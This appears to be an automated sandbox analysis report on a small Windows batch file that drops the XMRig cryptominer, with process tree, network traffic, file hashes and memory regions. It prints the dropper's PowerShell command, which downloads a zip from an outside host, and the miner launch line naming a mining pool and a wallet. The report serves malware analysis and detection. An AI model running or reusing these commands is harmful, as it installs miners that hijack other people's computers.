Analysis

  • max time kernel
    1799s
  • max time network
    1785s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231025-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2023 13:27

General

  • Target

    tesy - Copy (13).bat

  • Size

    706B

  • MD5

    035f17438f6146d5ac7285b4adfeb370

  • SHA1

    ef83c877367e96073e2b9b841d9c03ece6b1df7e

  • SHA256

    02261a07ff83d906a835ac5229b25595239717e0091f2462804d0a31859bbdc0

  • SHA512

    49455c7edd51537ba92e2db0941f571cd6ad89252702a19cf5910b390b182c16fc970ca62c26582b293ac5fc096e84538c5634472ab6e31bbd29242e8bb816cf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip", "test1.zip")
2
URLs
exe.dropper

https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip

Signatures

  • XMRig Miner payload 64 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (13).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip', 'test1.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'test1.zip' -DestinationPath '.'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2652
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K start.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3856
      • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exe
        xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1108

Network

  • flag-us
    DNS
    59.128.231.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.128.231.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    cdn.nest.rip
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    cdn.nest.rip
    IN A
    Response
    cdn.nest.rip
    IN A
    188.114.97.0
    cdn.nest.rip
    IN A
    188.114.96.0
  • flag-us
    GET
    https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip
    powershell.exe
    Remote address:
    188.114.97.0:443
    Request
    GET /uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip HTTP/1.1
    Host: cdn.nest.rip
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 11 Nov 2023 13:28:45 GMT
    Content-Type: application/octet-stream
    Content-Length: 3331483
    Connection: keep-alive
    Content-Disposition: filename="test1.zip"
    Content-Security-Policy: block-all-mixed-content
    Etag: "95452958f42b1b93f0c887f59d84d19f"
    Last-Modified: Mon, 23 Oct 2023 15:04:10 GMT
    Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
    Vary: Origin
    X-Amz-Request-Id: 17933D7ECC5874A5
    X-Content-Type-Options: nosniff
    X-Xss-Protection: 1; mode=block
    X-Amz-Meta-Originaluploader: 1805da94-c7b9-448d-b4b1-b34cd5b75d2b
    Drive: SSD
    CF-Cache-Status: HIT
    Age: 6398
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EpRyoG64ADFJMDKovPXh9yojKo590DaEXfHKVrzDbXMykzJ38pj1TPvgT5cJoG6ItDxxcrU2TD00%2Fevx37gQGfPnhIWWm6Xd5expweWWr1y6kPAYRrHkOGoOEjGoJF4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8246e1529e9bb926-AMS
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.97.114.188.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.97.114.188.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.1.85.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.1.85.104.in-addr.arpa
    IN PTR
    Response
    198.1.85.104.in-addr.arpa
    IN PTR
    a104-85-1-198deploystaticakamaitechnologiescom
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    pool.hashvault.pro
    xmrig.exe
    Remote address:
    8.8.8.8:53
    Request
    pool.hashvault.pro
    IN A
    Response
    pool.hashvault.pro
    IN A
    45.76.89.70
    pool.hashvault.pro
    IN A
    95.179.241.203
  • flag-us
    DNS
    203.241.179.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    203.241.179.95.in-addr.arpa
    IN PTR
    Response
    203.241.179.95.in-addr.arpa
    IN PTR
    95179241203vultrusercontentcom
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    66.112.168.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    66.112.168.52.in-addr.arpa
    IN PTR
    Response
  • 188.114.97.0:443
    https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip
    tls, http
    powershell.exe
    89.3kB
    3.4MB
    1575
    2476

    HTTP Request

    GET https://cdn.nest.rip/uploads/fe8c3030-34d2-4153-bdb3-f0ef0fdd51b2.zip

    HTTP Response

    200
  • 95.179.241.203:80
    pool.hashvault.pro
    tls
    xmrig.exe
    20.9kB
    56.0kB
    180
    141
  • 8.8.8.8:53
    59.128.231.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    59.128.231.4.in-addr.arpa

  • 8.8.8.8:53
    cdn.nest.rip
    dns
    powershell.exe
    58 B
    90 B
    1
    1

    DNS Request

    cdn.nest.rip

    DNS Response

    188.114.97.0
    188.114.96.0

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    0.97.114.188.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    0.97.114.188.in-addr.arpa

  • 8.8.8.8:53
    198.1.85.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    198.1.85.104.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    pool.hashvault.pro
    dns
    xmrig.exe
    64 B
    96 B
    1
    1

    DNS Request

    pool.hashvault.pro

    DNS Response

    45.76.89.70
    95.179.241.203

  • 8.8.8.8:53
    203.241.179.95.in-addr.arpa
    dns
    73 B
    122 B
    1
    1

    DNS Request

    203.241.179.95.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    66.112.168.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    66.112.168.52.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    a5c074e56305e761d7cbc42993300e1c

    SHA1

    39b2e23ba5c56b4f332b3607df056d8df23555bf

    SHA256

    e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

    SHA512

    c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ej1bl04p.pze.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\test1.zip

    Filesize

    3.2MB

    MD5

    95452958f42b1b93f0c887f59d84d19f

    SHA1

    c861dc457d57471ab42879f49cc8fe171e7c9b1c

    SHA256

    dc24f4d37898468e34bee09afdcb7e1fc681ecbac667bc8eb3c62d035c0fd255

    SHA512

    96207cb7d6cb2977acfbc5e9f507fe0b1b43a5041e5ea50c63f4f7db620fa14512066781c306ba123b0e6aafbb048c4b042f5fdb21e97a48a536acd783b2e072

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\start.cmd

    Filesize

    278B

    MD5

    080123b6eac4a332d3f2b11f6eb3aa54

    SHA1

    8f3d40eae881e3b871cff2aa85521d727ada2a64

    SHA256

    cd7f2c4251361d8e83bc1857767c6eb20d305605ca78418aca3af439ff7d41e2

    SHA512

    0c5033e8a72a924d360bec1b1304889b23dea6a514cd18b055824c19d440a2875472ba70202efb4b7b636398ebd114b365ce88ca18b88a129588639c26d62d8c

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exe

    Filesize

    7.9MB

    MD5

    4813fa6d610e180b097eae0ce636d2aa

    SHA1

    1e9cd17ea32af1337dd9a664431c809dd8a64d76

    SHA256

    9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

    SHA512

    5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

  • memory/1108-77-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-115-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-81-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-114-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-79-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-113-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-112-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-111-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-47-0x000001FF390C0000-0x000001FF390E0000-memory.dmp

    Filesize

    128KB

  • memory/1108-48-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-49-0x000001FF3A9D0000-0x000001FF3AA10000-memory.dmp

    Filesize

    256KB

  • memory/1108-50-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-52-0x000001FF3AA30000-0x000001FF3AA50000-memory.dmp

    Filesize

    128KB

  • memory/1108-51-0x000001FF3AA10000-0x000001FF3AA30000-memory.dmp

    Filesize

    128KB

  • memory/1108-53-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-54-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-55-0x000001FF3AA10000-0x000001FF3AA30000-memory.dmp

    Filesize

    128KB

  • memory/1108-56-0x000001FF3AA30000-0x000001FF3AA50000-memory.dmp

    Filesize

    128KB

  • memory/1108-57-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-58-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-59-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-60-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-61-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-62-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-63-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-64-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-65-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-66-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-67-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-68-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-69-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-80-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-71-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-72-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-73-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-74-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-75-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-76-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-110-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-78-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-109-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-70-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-108-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-82-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-83-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-84-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-85-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-86-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-87-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-88-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-89-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-90-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-91-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-92-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-93-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-94-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-95-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-96-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-97-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-98-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-99-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-100-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-101-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-102-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-103-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-104-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-105-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-106-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/1108-107-0x00007FF738020000-0x00007FF738B23000-memory.dmp

    Filesize

    11.0MB

  • memory/2652-43-0x00007FF8E1D50000-0x00007FF8E2811000-memory.dmp

    Filesize

    10.8MB

  • memory/2652-19-0x00007FF8E1D50000-0x00007FF8E2811000-memory.dmp

    Filesize

    10.8MB

  • memory/2652-25-0x0000025AB9560000-0x0000025AB9570000-memory.dmp

    Filesize

    64KB

  • memory/2652-30-0x0000025AB9560000-0x0000025AB9570000-memory.dmp

    Filesize

    64KB

  • memory/2652-32-0x0000025AB9560000-0x0000025AB9570000-memory.dmp

    Filesize

    64KB

  • memory/2652-34-0x0000025AD1D10000-0x0000025AD1D1A000-memory.dmp

    Filesize

    40KB

  • memory/2652-33-0x0000025AD1D30000-0x0000025AD1D42000-memory.dmp

    Filesize

    72KB

  • memory/4864-9-0x00000193BEFE0000-0x00000193BF002000-memory.dmp

    Filesize

    136KB

  • memory/4864-11-0x00000193BEB50000-0x00000193BEB60000-memory.dmp

    Filesize

    64KB

  • memory/4864-10-0x00007FF8E1F40000-0x00007FF8E2A01000-memory.dmp

    Filesize

    10.8MB

  • memory/4864-12-0x00000193BEB50000-0x00000193BEB60000-memory.dmp

    Filesize

    64KB

  • memory/4864-13-0x00000193BEB50000-0x00000193BEB60000-memory.dmp

    Filesize

    64KB

  • memory/4864-17-0x00007FF8E1F40000-0x00007FF8E2A01000-memory.dmp

    Filesize

    10.8MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.